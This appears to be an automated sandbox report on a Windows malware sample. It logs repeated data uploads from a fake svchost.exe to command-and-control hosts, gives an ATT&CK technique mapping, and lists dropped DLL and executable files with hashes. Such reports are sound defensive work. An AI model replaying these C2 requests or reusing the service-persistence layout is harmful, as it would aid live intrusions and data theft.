Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54972
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:14:18 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:14:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54972
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:14:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:14:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54972
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:14:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:14:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54972
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:14:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:14:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54969
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:15:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:15:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54969
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:15:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:15:19 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54969
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:15:28 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:15:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54969
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:15:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 60
Host: sta.alie3ksgee.com

Response

HTTP/1.1 200 OK

Server: nginx
Date: Thu, 13 Jun 2024 06:15:43 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/7.4.33
POST

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

svchost.exe

Remote address:

103.146.158.221:80

Request

POST /update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Content-Length: 54969
Host: sta.alie3ksgee.com
DNS

171.39.242.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

171.39.242.20.in-addr.arpa

IN PTR

Response
DNS

cl.alie3ksgff.com

svchost.exe

Remote address:

8.8.8.8:53

Request

cl.alie3ksgff.com

IN A

Response

cl.alie3ksgff.com

IN A

104.238.164.6
DNS

6.164.238.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

6.164.238.104.in-addr.arpa

IN PTR

Response

6.164.238.104.in-addr.arpa

IN PTR

1042381646vultrusercontentcom
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

22.236.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.236.111.52.in-addr.arpa

IN PTR

Response
DNS

17.173.189.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

17.173.189.20.in-addr.arpa

IN PTR

Response

103.146.158.221:80

http://sta.alie3ksgee.com/123.456

http

e6de332ad778f7a7cf160efa60656c3ac960dc77806905493d5cffe58ee1de16.exe

96.7kB
2.6MB
1877
1871

HTTP Request

GET http://sta.alie3ksgee.com/xxxxxxxx.jpg

HTTP Response

200

HTTP Request

GET http://sta.alie3ksgee.com/aaaaaaaa.jpg

HTTP Response

200

HTTP Request

GET http://sta.alie3ksgee.com/123.456

HTTP Response

200
204.79.197.237:443

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8_loITGXFTi6PeZSKY6CgWDVUCUw8H8AfUdMFqjJEmQNdHs-Dqx7ibW9K9GxZZTcHGo8DbFowgF2Z9_nBck49zlEgQ92f1ZcPQ8s30PhlH-OBM-X1AlfguFB8p3w1oGuE4liRaaHRm93Ip2kBFWAsiAj7HB1Z-6qdHeiP8Wl0Fp94ywn8%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZmV4Y2VsJTNmb2NpZCUzZGNtbWlleWJ1cjRj%26rlid%3De2455dbd6fc8159f78543bd5c75b72d8&TIME=20240611T194241Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:E27E96ED-1C24-B87C-D753-8842C7811920&deviceId=6825835402279670&muid=E27E96ED1C24B87CD7538842C7811920

tls, http2

2.5kB
9.0kB
19
17

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8_loITGXFTi6PeZSKY6CgWDVUCUw8H8AfUdMFqjJEmQNdHs-Dqx7ibW9K9GxZZTcHGo8DbFowgF2Z9_nBck49zlEgQ92f1ZcPQ8s30PhlH-OBM-X1AlfguFB8p3w1oGuE4liRaaHRm93Ip2kBFWAsiAj7HB1Z-6qdHeiP8Wl0Fp94ywn8%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZmV4Y2VsJTNmb2NpZCUzZGNtbWlleWJ1cjRj%26rlid%3De2455dbd6fc8159f78543bd5c75b72d8&TIME=20240611T194241Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:E27E96ED-1C24-B87C-D753-8842C7811920&deviceId=6825835402279670&muid=E27E96ED1C24B87CD7538842C7811920

HTTP Response

204

HTTP Request

GET https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8_loITGXFTi6PeZSKY6CgWDVUCUw8H8AfUdMFqjJEmQNdHs-Dqx7ibW9K9GxZZTcHGo8DbFowgF2Z9_nBck49zlEgQ92f1ZcPQ8s30PhlH-OBM-X1AlfguFB8p3w1oGuE4liRaaHRm93Ip2kBFWAsiAj7HB1Z-6qdHeiP8Wl0Fp94ywn8%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZmV4Y2VsJTNmb2NpZCUzZGNtbWlleWJ1cjRj%26rlid%3De2455dbd6fc8159f78543bd5c75b72d8&TIME=20240611T194241Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:E27E96ED-1C24-B87C-D753-8842C7811920&deviceId=6825835402279670&muid=E27E96ED1C24B87CD7538842C7811920

HTTP Response

204
23.62.61.162:443

https://www.bing.com/aes/c.gif?RG=440a5f9c1f04400d878275eb0619a83c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T194241Z&adUnitId=11730597&localId=w:E27E96ED-1C24-B87C-D753-8842C7811920&deviceId=6825835402279670

tls, http2

1.4kB
5.3kB
16
11

HTTP Request

GET https://www.bing.com/aes/c.gif?RG=440a5f9c1f04400d878275eb0619a83c&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T194241Z&adUnitId=11730597&localId=w:E27E96ED-1C24-B87C-D753-8842C7811920&deviceId=6825835402279670

HTTP Response

200
103.146.158.221:80

http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

http

svchost.exe

1.2MB
51.8kB
959
655

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=0&validate=1c12183a546547536b97683d6dd7dcad

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/post?sid=1727096&validate=3192484e0f41f304f788c9b46217feff

HTTP Response

200

HTTP Request

POST http://sta.alie3ksgee.com/update/upload?cid=4891&validate=3192484e0f41f304f788c9b46217feff

8.8.8.8:53

sta.alie3ksgee.com

dns

svchost.exe

64 B
80 B
1
1

DNS Request

sta.alie3ksgee.com

DNS Response

103.146.158.221
8.8.8.8:53

g.bing.com

dns

56 B
151 B
1
1

DNS Request

g.bing.com

DNS Response

204.79.197.237

13.107.21.237
8.8.8.8:53

140.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

140.32.126.40.in-addr.arpa
8.8.8.8:53

144.107.17.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

144.107.17.2.in-addr.arpa
8.8.8.8:53

162.61.62.23.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

162.61.62.23.in-addr.arpa
8.8.8.8:53

221.158.146.103.in-addr.arpa

dns

74 B
162 B
1
1

DNS Request

221.158.146.103.in-addr.arpa
8.8.8.8:53

myxqbh.top

dns

svchost.exe

56 B
72 B
1
1

DNS Request

myxqbh.top

DNS Response

182.108.15.99
182.108.15.99:6666

myxqbh.top

svchost.exe

1.8kB
33
8.8.8.8:53

99.15.108.182.in-addr.arpa

dns

72 B
160 B
1
1

DNS Request

99.15.108.182.in-addr.arpa
8.8.8.8:53

86.23.85.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

86.23.85.13.in-addr.arpa
8.8.8.8:53

171.39.242.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

171.39.242.20.in-addr.arpa
8.8.8.8:53

cl.alie3ksgff.com

dns

svchost.exe

63 B
79 B
1
1

DNS Request

cl.alie3ksgff.com

DNS Response

104.238.164.6
104.238.164.6:6666

cl.alie3ksgff.com

svchost.exe

1.8kB
33
8.8.8.8:53

6.164.238.104.in-addr.arpa

dns

72 B
120 B
1
1

DNS Request

6.164.238.104.in-addr.arpa
182.108.15.99:6666

myxqbh.top

svchost.exe

1.8kB
33
104.238.164.6:6666

cl.alie3ksgff.com

svchost.exe

1.8kB
33
182.108.15.99:6666

myxqbh.top

svchost.exe

1.9kB
36
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

22.236.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

22.236.111.52.in-addr.arpa
104.238.164.6:6666

cl.alie3ksgff.com

svchost.exe

1.8kB
33
182.108.15.99:6666

myxqbh.top

svchost.exe

1.8kB
33
104.238.164.6:6666

cl.alie3ksgff.com

svchost.exe

1.8kB
33
182.108.15.99:6666

myxqbh.top

svchost.exe

1.8kB
33
8.8.8.8:53

17.173.189.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

17.173.189.20.in-addr.arpa
104.238.164.6:6666

cl.alie3ksgff.com

svchost.exe

1.8kB
33
182.108.15.99:6666

myxqbh.top

svchost.exe

1.8kB
33
104.238.164.6:6666

cl.alie3ksgff.com

svchost.exe

1.8kB
33
182.108.15.99:6666

myxqbh.top

svchost.exe

1.8kB
33
104.238.164.6:6666

cl.alie3ksgff.com

svchost.exe

1.8kB
33
182.108.15.99:6666

myxqbh.top

svchost.exe

1.8kB
33
104.238.164.6:6666

cl.alie3ksgff.com

svchost.exe

1.8kB
33
182.108.15.99:6666

myxqbh.top

svchost.exe

1.8kB
33
104.238.164.6:6666

cl.alie3ksgff.com

svchost.exe

1.8kB
33
182.108.15.99:6666

myxqbh.top

svchost.exe

1.8kB
33
104.238.164.6:6666

cl.alie3ksgff.com

svchost.exe

1.9kB
36
182.108.15.99:6666

myxqbh.top

svchost.exe

1.6kB
30

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows Media Player\background.jpg

Filesize
1.9MB

MD5
b37c3d3ab20f7e8a06232330122d1ed7

SHA1
6daa977d591b1cbb1ecde9fd82e14287a284bdd2

SHA256
e796f0d6d6960af232a1b8f039cd45a703c1743dfd6f4098cdde0a46a69e33a2

SHA512
da26eee1e9f1d594f2f4604838b66dac95db29373a59e347b1cf31022eb0040f5a9ebdd50c12f4af1dbbfd7c5bae20f3937cbdd8016e441d8822f9f86d03e5bb

Download Submit
C:\Program Files\Windows Media Player\down_info

Filesize
4B

MD5
e9257036daf20f062a498aab563d7712

SHA1
dc3c03160a963f53d408a0ed65f17901fe7ad6b8

SHA256
42a8d10424653fc26a1319a0c7f84ea30f43c8a009e7d99fcd9e8151332bdcf3

SHA512
1c65067b8b023e634437d5d64bb370521d26d00ea9cd2523671f6bed1c54cd510b0b962d987ebd89cf38fc4617cf01ff8c9669b2168e6719ed19a0a26ac05ac1

Download Submit
C:\Program Files\Windows Media Player\mpsvc.dll

Filesize
126KB

MD5
7b207ce9f9d71dfc2eaa2e959634a54d

SHA1
8222daa0c820e50d02ffabdc55dfb7461bbaa1e5

SHA256
757af7a540628004b446117be432342674f7830fa008f97a5f4a1ac386954bc2

SHA512
6ffbe6e33768e2fbea8c7cee428eb4b61e3eb1dd12e470de363f1d6e274296adabc8d1e681fe5a5f2b1dc8e8eb08bd360572bfd34706e82580c51be57f6fcf5a

Download Submit
C:\Program Files\Windows Media Player\wmpnetwk.exe

Filesize
23KB

MD5
90b85ffbdeead1be861d59134ea985b0

SHA1
55e9859aa7dba87678e7c529b571fdf6b7181339

SHA256
ed0dc979eed9ab9933c49204d362de575c7112a792633fda75bb5d1dab50a5c2

SHA512
8a1c10bbfe5651ab25bf36f4e8f2f65424c8e1004696c8141498b99ea2fbd7b3e5fae4d2cfee6835f7ff46bd2333602f4d8ac4a0f5b8e9757adb176332a3afce

Download Submit
C:\Windows\Temp\aad9f05a9a826b65ff2b94740ca196c2

Filesize
53KB

MD5
6bbeb71119422f08d999c7551e295480

SHA1
33e035d5936ba1568042143ad5be1a58f6b9e413

SHA256
b796efa9a01b9339de98535ad18a2f23c69f98185546f418c4509e0b0b95264a

SHA512
f818845f26951db462427ad04c506abb7827b167908392dff5e79b35826b2507b7319b6b970bb0cec54aa4955999a241a9cf8df63ac491ad2d8aa036859f10ba

Download Submit
C:\kkxqbh.bat

Filesize
135B

MD5
44a3af72a2e7efad7f05b5b264f2b133

SHA1
cfd7c8451a0c6e8123328b18f96bec50d04b50ab

SHA256
471ff503db8bd1d39701d587ec4f2d3c97c2843a53e812fe726c970f7306fbb4

SHA512
3d2009c7d4b82fd970ced78fe97b0d5ed08ca7a33480969deb5345195e50877e5efe8f80eeca86c63c5f87cc3779f7f9aba47eb1cca1c29656cb4f74bfd4e14a

Download Submit
memory/2120-3-0x0000018188A50000-0x0000018188A7C000-memory.dmp

Filesize
176KB

Download
memory/2120-5-0x00007FF7773D0000-0x00007FF77740C000-memory.dmp

Filesize
240KB

Download
